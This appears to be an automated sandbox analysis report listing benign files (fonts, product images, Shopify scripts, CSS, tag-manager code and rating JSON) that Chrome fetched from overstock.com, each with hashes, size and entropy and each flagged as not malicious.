                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                                                                                          SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                                                                                          SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                                                                                          SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                                                                                          Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):283
                                                                                                                                                          Entropy (8bit):4.779630307837776
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:99C343162D3792F54623262F1634A1EC
                                                                                                                                                          SHA1:0EBB43D47D150311C0471FB50369E493B18560F4
                                                                                                                                                          SHA-256:66E727CEFC7F3C46CC86E71B4A94ECB07A5F87BDC2F4B2DDBAEDA8CF19CEE0FC
                                                                                                                                                          SHA-512:6631A75644FB35A26CB4891FDEBA9DE53DD5C08A224A0AB50945BC91E62613B5B68E84F90E6FE5D0C82BDFA95753EC4162146EC198E3F05A11DB9C0CF6D1F53C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cart.js?app=gfgfreegift
                                                                                                                                                          Preview:{"token":"ca3d18b41f92f5af728f111b320accf0","note":null,"attributes":{},"original_total_price":0,"total_price":0,"total_discount":0,"total_weight":0.0,"item_count":0,"items":[],"requires_shipping":false,"currency":"USD","items_subtotal_price":0,"cart_level_discount_applications":[]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40825
                                                                                                                                                          Entropy (8bit):7.9715573166226
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6849FEB0774F863CD34B1563B8E9E6C6
                                                                                                                                                          SHA1:2C3EF568FC61BB90C6C25E9BCCA9A70AB1D9399A
                                                                                                                                                          SHA-256:9ED4BE3389191481317C1A14F3F6E40EC5CB5C8E9595B8B4B5D59FEC5DB79F97
                                                                                                                                                          SHA-512:4096775AB0AF22C61CB5B196AC298DD3EF0C8DAED68A0D45F3CD05A2D887F9EBE012098717F5EA9DD333E2E87730B6E2136AE763E689A055BEEBDBBD0261D5AB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.....................................................................................~fyo-.}[.05..w.x.72.k.7..X......```|.u.5.6V......s......h|.i.l.-.o.W:r..)..<.....J.......>.........z%....d;4X...-.w"......+51..q
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (58819)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2632943
                                                                                                                                                          Entropy (8bit):5.304321459328468
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:56B6387851ED73C073F6D6AF2FE2B448
                                                                                                                                                          SHA1:4AFA3E8A91A38F3B8BC0C5BA7B2145C58C267190
                                                                                                                                                          SHA-256:CEFE53D90217D70E20ACC3D83D55BD9791B3C1D439ED07B220FC7E6C366E7B99
                                                                                                                                                          SHA-512:5EF14E06A292D4A69A0AF01409BCB969EB1BC570B283EA97BD7152456A0899839338137FA865CCD55E364D2FD2FD4718DF7E156401E735824DE4F7B0641658A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/
                                                                                                                                                          Preview:<!doctype html>.<html class="no-js" lang="en" dir="ltr">.<head>. <script>. if (!window.DOMAINE) window.DOMAINE = {};. window.DOMAINE.technical = {. apiVersion: "2024-07",. storefrontToken: "72e5b536982e2714efe8f8314d50d8f3",. shopName: "a37a28-2.myshopify.com",. louserzation: {. countryCode: "US",. currencyCode: "USD". }. };.</script>.. <script>. const _url = new URL("https://www.overstock.com/").. if (_url.host === 'a37a28-2.myshopify.com' || _url.host === 'checkout.overstock.com') {. _url.host = 'www.overstock.com';. window.location = _url.toString();. }.. if (_url.pathname === '/account/login') {. const loginURL = new URL('?redirect_to=https%3A%2F%2Fwww.overstock.com%2F', 'https://login.overstock.com');. window.location = loginURL.toString();. }. . const query = new URLSearchParams(window.location.search).get('q')?.toLowerCase();. const path = window.location.pathname;.. if (path === '/search' && query) {.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (22272)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):22273
                                                                                                                                                          Entropy (8bit):5.402563802444255
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:DFD1D6C092C96EEDBBA52EFB0CB5F1F8
                                                                                                                                                          SHA1:6E259CCC787A266532F5818B131FB59A4DE509CE
                                                                                                                                                          SHA-256:BBDA5C7D2142A783C7A2A597EAF86014469329EF88E279D31967F3AAA45D5141
                                                                                                                                                          SHA-512:E610BE7D184DF2B0C8F836AE4514BE939AB7E9160E18E4A2E3A9947DF6681138B4680C5DB3A8715F78086A03E52FF97FEBB2DCBE40A863B82ECCA0F57A2068A1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/component-ShopPayVerificationSwitch.DfLc0zrq.js
                                                                                                                                                          Preview:import{hf as He,t as ue,cI as ge,v as ze,r as Pe,o as te,T as V,cJ as de,by as We,bD as Ge,bH as ve,h as B,q as b,D as we,a as C,eF as qe,A,hg as Ke,hh as je,y as g,ad as me,hi as Qe,aa as Ce,dh as Ye,hj as Je,hk as Xe,bi as Ie,hl as Me,d as ae,aS as ie,aN as be,hm as Le,hn as X,ho as Ae,fc as ce,hp as ee,hq as W,hr as De,hs as q,ht as ne,hu as le,hv as Ze,hw as oe,hx as Ne,hy as et,cF as U,z as tt,bQ as nt,e as ot,c1 as st,cy as rt,cC as at,hz as it,hA as Te,hB as ct,hC as ut,bA as dt,ak as lt,hD as ye}from"./app.CRtF78CU.js";import{M as O}from"./DeliveryMethodSelectorSection.DmSUYxZn.js";import{u as ht,p as G,S as $,A as J,a as ft,M as xe,b as pt}from"./publishMessage.Zuhtx4a1.js";import{a as mt,u as yt,U as Se}from"./useUnauthenticatedErrorModal.gdEu53Hp.js";import{u as St,a as Ue,P as _t,C as Et,i as se,b as kt,c as Z,d as he,e as Ve,f as fe,g as gt,A as Pt,h as vt,r as wt,R as Ct,j as It}from"./index.C7lQ-Nke.js";import"./LegacyVaultedShippingMethods.8dZ3Q6PP.js";import"./Rollup.B
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):19
                                                                                                                                                          Entropy (8bit):3.576617644908667
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:980021208D52C1907A8256F57F077691
                                                                                                                                                          SHA1:CC2EF6376333CDFB4E18210689B4FFAE4FD60C39
                                                                                                                                                          SHA-256:B5865D15F4439D43678F8F1165CA58106C42C0F1AFF9419DFC642FA4DCDAC269
                                                                                                                                                          SHA-512:ABC045334B3A69A098E0D5AC0F391F389350432E8090C379829C3E7722FB991CC19E1F419CF3A150FC8A9351D359C0C6944AE2D782FFE7C24A4B4027A6111028
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:RBAC: access denied
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Java source, ASCII text, with very long lines (3362)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3363
                                                                                                                                                          Entropy (8bit):4.574223166361565
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:640B1880EE775DE4DC8ECF8994D9C597
                                                                                                                                                          SHA1:2C68EB242358B3CFB43D00E48C5434C78FAAA575
                                                                                                                                                          SHA-256:C9C48D49662B81FF5830E0A32FBEF5B810D728FDF600D49F5BCBD4558A212FA9
                                                                                                                                                          SHA-512:27DAE5C56C2987A1CE775699BEB494273B4751EF61832DDD7C8CC2174F4814BC1F77E2EBE3241620366DA765C082723647909DF68E720308008166C0D5591E97
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/ShopPayLogo.D_tvM4Kt.js
                                                                                                                                                          Preview:import{ab as c,ac as t,a as h,ad as m}from"./app.CRtF78CU.js";const o="_8ssCG",v="zS4x6",d="PrlUn",r="SsCEp",p="aTkbO",s={xsmall:o,small:v,medium:d,large:r,inline:p},z=a=>c("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"inherit","aria-hidden":"true",preserveAspectRatio:"xMidYMid",viewBox:"0 0 341 80.035",...a},c("path",{fillRule:"evenodd",d:"M227.297 0c-6.849 0-12.401 5.472-12.401 12.223v55.59c0 6.75 5.552 12.222 12.401 12.222h101.06c6.849 0 12.401-5.472 12.401-12.222v-55.59c0-6.75-5.552-12.223-12.401-12.223zm17.702 55.892v-14.09h8.994c8.217 0 12.586-4.542 12.586-11.423s-4.369-11-12.586-11h-14.788v36.513zm0-31.084h7.664c5.319 0 7.932 2.154 7.932 5.758s-2.518 5.758-7.695 5.758h-7.901zm31.796 31.833c4.417 0 7.314-1.92 8.644-5.196.38 3.65 2.613 5.523 7.457 4.26l.048-3.886c-1.948.187-2.328-.515-2.328-2.528v-9.55c0-5.617-3.752-8.94-10.686-8.94-6.84 0-10.782 3.37-10.782 9.08h5.32c0-2.714 1.947-4.353 5.367-4.353 3.609 0 5.272 1.545 5.224 4.214v1.217l-6.127.655c-6.887.749-10.686 3.324-10.686
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (5945)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):333210
                                                                                                                                                          Entropy (8bit):5.600200242490519
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:A05D624D444B3C374C3C6885A642DE37
                                                                                                                                                          SHA1:39458D3912EF107837F8089424AB88B5C812ADAA
                                                                                                                                                          SHA-256:98A5385DA161B8703FEF9E86FC0DC5E4E7E3EDEDFC3F9565FA35C83968F964B4
                                                                                                                                                          SHA-512:178D13BC1E98A58345975BD4A3C9385D9DE3774B0AE6E45E5CA407FAB544B40CA91E879A76A7E3587C0D15F140C15EAB9B6EAFCFBAAC2DE9E28BBCCCD4AAD060
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-HRLVQWRG93
                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":14,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (12303)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):12394
                                                                                                                                                          Entropy (8bit):5.287767589825684
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:C7F434D5C1A2062A408CFFD365EECAAD
                                                                                                                                                          SHA1:058F5344C8E3EA9B9F9C56CEB7861B59A22C0CF8
                                                                                                                                                          SHA-256:81EBF0A03E81A1E2229E242B727DED6CA94F4734FCF7551A433C24BB9EF7371A
                                                                                                                                                          SHA-512:DCE67FC4C0A53EA0E741CC025A9BADF9FBAA5997BECDB958463C74B829E8BABC99A8B22BDD38891AE4897376A73588CEFF329A579DDD875DE311B30A022DD771
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:(function(shopify) {.(()=>{var se="WebPixel::Render";var Y=e=>shopify.extend(se,e);var K={config:0,set:1,page_view:2,view_item:3,add_to_cart:4,purchase:5,begin_checkout:6,search:7,add_payment_info:8,update:9,default:10},ce={send_to:0,page_path:1,page_title:2,page_location:3,ignore_referrer:4,ecomm_prodid:5,ecomm_totalvalue:6,ecomm_pagetype:7,items:8,id:9,name:10,brand:11,category:12,coupon:13,price:14,quantity:15,variant:16,value:17,currency:18,tax:19,shipping:20,search_term:21,total:22,transaction_id:23,ad_storage:24,ad_user_data:25,ad_personalization:26,analytics_storage:27},le={config:[],set:[],page_view:["send_to"],view_item:["send_to","ecomm_prodid"],add_to_cart:["send_to","ecomm_prodid"],purchase:["send_to","transaction_id"],begin_checkout:["send_to"],search:["send_to"],add_payment_info:["send_to"]};var fe="",ge=function(e){fe=e},Pe=Math.floor(Math.random()*2147483648),pe=function(){if(arguments[0]==="js")return;let r=window.dataLayer.filter(o=>Object.prototype.toString.call(o)==
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7707
                                                                                                                                                          Entropy (8bit):7.615419087061975
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:70C980A4A755BEB907587BD55E854B3D
                                                                                                                                                          SHA1:CFE09B06207CDAF6DC2F35240F79C90FD79BB841
                                                                                                                                                          SHA-256:BEAE42994A55BB4EC320C88170C0C0DCC7F81FB1B23F3B2485538C4C030F2B4A
                                                                                                                                                          SHA-512:9BB68A852C48A57AB5ED4ABD67877CD532AB693BCBE34DF732FBEBA3366D4DAFB9DBA3BD81C8D542100B7C193BF6836F51755251C5B437D2F855700F9A2571F3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@.................................................................................................................................................................................V...............G.]&u.![....>..}........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):33028
                                                                                                                                                          Entropy (8bit):7.940101144385067
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D70BBAD6DF9C4988997160444393E3A0
                                                                                                                                                          SHA1:B4092112E83982670EB61512ABD7EB6A8B604727
                                                                                                                                                          SHA-256:C8D48F3C47583956C767F50BC2ABDCE2E3EF611970F00BB1E63D2D3F4F9B113A
                                                                                                                                                          SHA-512:A4E338FC27F07D560200F1F6153B4547524E0BB09C3062B1DB24D2411FC7894A58697908FAD014D9BAC6FF31DD949F0628E5640DCC02855E439103B1DA17132D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@................................................................................................x...A.g.............................`.0.\.[:......Z.Vj..Lz. .................<.N.f.-..Gq.=....+'...m.l3!.t...........
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):45579
                                                                                                                                                          Entropy (8bit):4.8337215080070255
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:567C95B933205358E0F67B52A9CE6713
                                                                                                                                                          SHA1:295BE94ECB86114683083BF270AB4F01F28668DA
                                                                                                                                                          SHA-256:2712EF51448B17E597FB874DADC81D2AC6B7F66BFB72A8700DE1A953242ABF4D
                                                                                                                                                          SHA-512:CEF02BE827B3FD71EF7C79C16DC803D5E6EC2011B67B56F252142BB51FFE49A11920504FD7F8F7DE9E50E86180A5BBCA44D0B7E8BF8A81BBDB4EAA33CAB3AD17
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://cdn.shopify.com/extensions/7176b64e-31ff-49da-8800-c9eec1bee9b0/kite-free-gift-discounts-368/assets/freeGiftLogicv1.css
                                                                                                                                                          Preview::root{.. --DEFAULT-BORDER-COLOR: #9EBADC;.. --DEFAULT-BG-COLOR: #4B556C;.. --BLACK-COLOR: #000000;.. --WHITE-COLOR: #FFFFFF;..}..../* reusable css classes starts */.....underline{.. text-decoration: underline !important;..}...no-underline{.. text-decoration: none;..}...no-underline > .underline{.. text-decoration: underline !important;..}...font-weight-medium{.. font-weight: 600;..}..../* reusable css classes ends */.........gfgFreeGiftMsgContainer {.. display: grid;.. grid-template-columns: 0.2fr 1fr;.. grid-template-rows: 1fr;.. font-size: 14px;.. box-shadow: 0 2px 4px 0px rgba(0, 0, 0, 0.2), 0 2px 10px 0 rgba(0, 0, 0, 0.19);.. grid-gap: 10px;.. padding: 10px 8px;.. border-radius: 4px;.. line-height: normal !important;..}.....gfgFreeGiftMsgIcon {.. width: 80px;.. height: 80px;....}.......gfgProductPageWrapperV2 {.. margin-bottom: 5px;.. line-height: normal;..}.....cart__ctas {.. display: grid !important;..}.....gfgVolD
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):28114
                                                                                                                                                          Entropy (8bit):7.977857659765073
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:D545CF30D3F18CA111D3297562A234F7
                                                                                                                                                          SHA1:15B5DD7E4D1782DF61DC7FC895AD8698F645A872
                                                                                                                                                          SHA-256:940C9830EC1AF062F8ADB32B4A5713A904B1281B125B331CC92F9682C8A67797
                                                                                                                                                          SHA-512:9156E0EEC0F7C7E10C9BE7E5133A434588B05FBB5C45D4B3B3C01FE91AF67A11F95528F30559F5CB1D8ACD772F0B6C6FFBB6671F193978907F64130BFB53E172
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Euphemia-Brown-Woven-Storage-Basket-Bench---33.5_22-x-16.1_22-x-19.9_22_5311171e-73cb-40b5-9ff7-9a6cfc5cf0a2.jpg?v=1717244554&width=320
                                                                                                                                                          Preview:RIFF.m..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 :k.......*@.@.>9..C"!...-. ......B..P...0/.l.......y......6...3....?....{.K.#.o.G....._..@~........../........]...._......#...I.....G._....i..~.....?....]....8.!.....?q..{../.]E>].k.......|..../.?........7......r..|.}....>.{....?.=....O._.?....R.O....O.W.O...._........./.o....................~.|z...O...7._......'.....'....._..~........?.3...........E.+....S.u~.~Yc]S3..e..TdG...!A.-.1.r...wk.[..b..|..q.a....K....?6...=Q.RN..o..{}U....;H....$..v.Z....2r.oWK..b....V....0....2.._[....3f>.p......k...2..c7..!z...$.).<.C
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32358
                                                                                                                                                          Entropy (8bit):7.958854260995069
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:0EC8A9486457FAD8BDEC95E7020216F4
                                                                                                                                                          SHA1:2E988F3A88310C5D590479D68AA7291492B040E2
                                                                                                                                                          SHA-256:95D6CB5E29B81B1DEB1BFF3A7943D040CC14B6ECF17099A565537ACFE8D60CB2
                                                                                                                                                          SHA-512:DBABF086ACC270811D6DA22555CFE4D71E572BCE0FD2AEA5637567AF542BBB7998EC9F6E9CE8D9432D438CF0E9DE08B7500EA8BE171F190F1FC580F014DCB3F4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@......................................................................................4...j.x..)..T.5.l...q....k.*J.B..jd.+B.L.X_.....(.4@...Y..^ ..I..h..r..\..xp.2X...tGIP..ak...-4....[.r..........[....{..cP...Y.&
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.694129593090887
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:8315C36EC733ECD0A7DBD6D32D25C3EA
                                                                                                                                                          SHA1:FAD77031FB3A6C2F18BFD32063B2ECCA47156C19
                                                                                                                                                          SHA-256:B5F7110B4CF8A692914028F748B6E40DB1A02B00D27759FCE87A2E42E485E955
                                                                                                                                                          SHA-512:52FC953C4888C92F530C4968D6FBB3C7CB5295DE3BAEFFF933E50A00C4EAA0E89CD09218FB207E4582ACEE6045B16F7574E4F6D41FC360ACCB611EC5B34AE5A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40453492","rollup":{"average_rating":4.75,"rating_count":875,"review_count":875,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.7213404774446275
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:BDAB4C0175B9445F587E9DDCAA152AB7
                                                                                                                                                          SHA1:8F89AA2EFCE2A41BC43FE3BE1A507FE32080D2EE
                                                                                                                                                          SHA-256:EA08BB33B2CE9B47380C0101316268DB987A8A09032CDE92DBB148240E7D5DB8
                                                                                                                                                          SHA-512:E04053C93B31E97FF0209A4095FC7918069B67BDC5C2848E0A8EBB318FBCCF97B34EE22E0625C73D74353BAA2649A1AAE999443DEC27822B2AC2ACB24C50BFE7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"40455377","rollup":{"average_rating":4.82,"rating_count":611,"review_count":611,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1006
                                                                                                                                                          Entropy (8bit):4.836413942661106
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:6E0DC54411BDE95A291A6933C2C63209
                                                                                                                                                          SHA1:F30E131D08E18B436566A0DD51FFC008E3AE42EA
                                                                                                                                                          SHA-256:3B20F1DC4E3B8C38FCB0F84DE3F9379124802EA313DAA293382E71DA116042B8
                                                                                                                                                          SHA-512:DB673798EA8D75A153ADCF2EADFFF0C21184CB6862F3A6D642948C3AB1442E1FBF64F217D5761BC7F5207355C065518ED6B15AF4E1DED19DD72A7F090FF5D147
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://assets.tapcart.com/__tc-ck-loader/index.js?appId=CeeweiHh1L&environment=production&shop=a37a28-2.myshopify.com
